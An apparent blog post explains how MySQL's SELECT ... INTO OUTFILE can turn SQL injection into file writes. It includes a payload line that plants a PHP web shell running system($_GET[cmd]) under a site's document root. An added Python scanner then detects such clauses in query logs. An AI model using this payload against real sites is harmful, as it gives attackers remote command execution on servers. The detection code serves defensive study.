(real life) next steps in SQL injection
We all know SQL injection and a bunch of techniques to exploit it... I've decided to blog about a "new" one. Please don't consider this "advanced SQL injection", because it's not.
MySQL is a great database management system and it allows you to do many things with the "select" statement. But isn't that TOO many things?
I guess everyone knows the basic "' or 1=1 /*" and its variants... but accessing restricted areas, changing user info and dropping tables aren't the only cool stuff you can do with SQL injections.
There is a feature that allows you to save the result of your select into a file. It's called SELECT ... INTO OUTFILE (duh!) and things can get pretty dangerous if you use it with a SQL injection.
Isn't it clear enough yet? Ok, let me try to help you get the big picture.
What if someone inserts this code:
' union select ''<?php ini_set(\"max_execution_time\",0); system($_GET[cmd]); /*'',0,0,0,'*/ ?>' into outfile ' /home/mysite/lol.php' from users #
Please note that you'll need to know the document root path, but this shouldn't be a problem with vulnerable PHP systems.
Well, I don't intend to give you a cookbook and promote n00bism. So, if you still haven't figured out how to take advantage of this, you probably shouldn't use it. Google might help you as well.
Happy hacking.
PS: syntax errors were generated on purpose.
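On the defensive side, the file-writing clause described above stands out in a MySQL query log. The following is an added example, not code from the original post: a small Python scanner that flags INTO OUTFILE / INTO DUMPFILE only when it appears outside string literals and comments. The sample queries, document root prefixes and script extensions are constructed assumptions.

```python
import re

# SQL lexer just detailed enough to tell real keywords from text inside
# string literals and comments. MySQL runs the body of /*! ... */, so that
# form is deliberately not treated as a comment.
TOKEN = re.compile(r"""
    (?P<str>'(?:[^'\\]|\\.|'')*'|"(?:[^"\\]|\\.|"")*")
  | (?P<cmt>/\*(?!!).*?\*/|\#[^\n]*|--[ \t][^\n]*)
  | (?P<word>[A-Za-z_]\w*)
  | (?P<other>\S)
""", re.X | re.S)

SCRIPT_EXT = (".php", ".phtml")        # assumed: what the web server executes
DOC_ROOTS = ("/var/www/", "/home/")    # assumed: where document roots live

def find_file_writes(query, doc_roots=DOC_ROOTS):
    """Return (clause, path, risky) for each INTO OUTFILE/DUMPFILE in query."""
    toks = [(m.lastgroup, m.group()) for m in TOKEN.finditer(query)
            if m.lastgroup != "cmt"]
    hits = []
    for (k1, v1), (k2, v2), (k3, v3) in zip(toks, toks[1:], toks[2:]):
        if (k1, v1.upper()) != ("word", "INTO") or k3 != "str":
            continue
        if k2 == "word" and v2.upper() in ("OUTFILE", "DUMPFILE"):
            path = v3[1:-1].strip()
            # Highest priority: a script file landing under a document root.
            risky = path.startswith(doc_roots) and path.lower().endswith(SCRIPT_EXT)
            hits.append((v2.upper(), path, risky))
    return hits

# Constructed sample queries, as they would appear in a query log.
SAMPLES = [
    "SELECT * FROM faq WHERE q = 'how to use into outfile ''safely'''",
    "SELECT id FROM t /* into outfile '/var/www/html/a.php' */ WHERE id = 1",
    "SELECT name, email FROM users INTO OUTFILE '/var/lib/mysql-files/export.csv'",
    "SELECT title FROM posts WHERE slug = '' UNION SELECT 'marker' "
    "INTO OUTFILE '/var/www/html/up/x.php' FROM users # '",
]

def scan(queries=SAMPLES):
    """Return [(query_index, clause, path, risky)] for every finding."""
    return [(i, *hit) for i, q in enumerate(queries) for hit in find_file_writes(q)]

if __name__ == "__main__":
    for i, clause, path, risky in scan():
        print(f"query {i}: {clause} -> {path} {'ALERT' if risky else 'review'}")
```

MySQL only honours INTO OUTFILE for accounts that hold the FILE privilege and, where secure_file_priv is set, only inside that directory, so any hit coming from a web application's database account also shows the account is over-privileged.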
